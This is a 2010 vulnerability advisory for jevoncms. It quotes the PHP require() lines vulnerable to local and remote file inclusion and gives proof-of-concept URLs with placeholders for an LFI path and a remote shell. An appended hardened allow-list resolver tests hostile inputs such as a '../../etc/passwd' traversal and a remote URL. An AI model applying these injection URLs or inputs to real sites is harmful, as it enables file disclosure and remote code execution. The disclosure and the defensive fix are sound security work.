SECURITYVULNS:DOC:23504
Apr 05, 2010

jevoncms (LFI/RFI) Multiple Vulnerabilities


########################################################
jevoncms (LFI/RFI) Multiple Vulnerabilities
########################################################

[+]Title : jevoncms (libdir) Multiple Vulnerability
[+]Version: -
[+]Download: http://sourceforge.net/projects/jevoncms/files/
[+]Author: eidelweiss
[+]Contact: eidelweiss[at]cyberservices[dot]com

    [!]Thanks To: all friends

########################################################

    -=[ Vuln C0de ]=-

[-] jevoncms/php/main/jevoncms.php

$_PHPLIB["libdir"] = "phplib/";
require($_PHPLIB["libdir"] ."template.inc"); /* Disable this, if you are not using templates. */
require("template/jvc_template.php");
require("php/main/database/jvc_Database.php");


[-] jevoncms/php/main/template/jvc_template.php

if($type!=$lasttype && $type!=''){
$path= "php/".$type."/".$type.".php" ;
// echo $path;
require($path);


[-] jevoncms/php/menu/menu.php

//require($_PHPLIB["libdir"] ."template.inc"); /* Disable this, if you are not using templates. */


    -=[ Proof Of Concept ]=-


    http://127.0.0.1/jevoncms/php/main/jevoncms.php?libdir=[lfi]

    http://127.0.0.1/jevoncms/php/main/template/jvc_template.php?path= [rfi shell]

    http://127.0.0.1/jevoncms/php/menu/menu.php?libdir=[lfi]

######################=[E0F]=#############################
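
A hardened form of the dynamic `require($path)` from jvc_template.php, as an added example that is not part of the original advisory or of jevoncms. It assumes `$type` can be influenced by request data; the function name, the module names in the allow-list and the temporary demo tree are hypothetical.

```php
<?php
// Added example (not jevoncms code): allow-list resolver for the dynamic
// require() shown in jvc_template.php. All names below are hypothetical.

const JVC_ALLOWED_TYPES = ['menu', 'main', 'news']; // assumed module names

/**
 * Map a requested module type to a file under $baseDir, or null if rejected.
 */
function jvc_resolve_include(string $type, string $baseDir): ?string
{
    // 1. Exact allow-list match: a request-derived string only reaches the
    //    path if it equals a name the application already knows.
    if (!in_array($type, JVC_ALLOWED_TYPES, true)) {
        return null;
    }

    // 2. Build the path the same way the original code does.
    $candidate = $baseDir . '/' . $type . '/' . $type . '.php';

    // 3. Canonicalise and confirm the result is still under $baseDir.
    //    realpath() returns false for paths that do not exist locally.
    $base = realpath($baseDir);
    $real = realpath($candidate);
    if ($base === false || $real === false) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo: a temporary tree holding one legitimate module.
$root = sys_get_temp_dir() . '/jvc_demo_' . getmypid();
@mkdir($root . '/menu', 0700, true);
file_put_contents($root . '/menu/menu.php', "<?php // stub module\n");

// Constructed inputs: one valid name, then values that must be rejected.
foreach (['menu', 'news', '../../etc/passwd', 'http://example.invalid/x', ''] as $t) {
    $resolved = jvc_resolve_include($t, $root);
    printf("%-28s => %s\n", var_export($t, true), $resolved ?? 'REJECTED');
}
```

Only `menu` resolves in the demo: `news` is on the allow-list but has no file in the constructed tree, and the remaining inputs fail the allow-list check. Keeping `allow_url_include` set to `Off` in php.ini additionally stops `require` from fetching remote URLs.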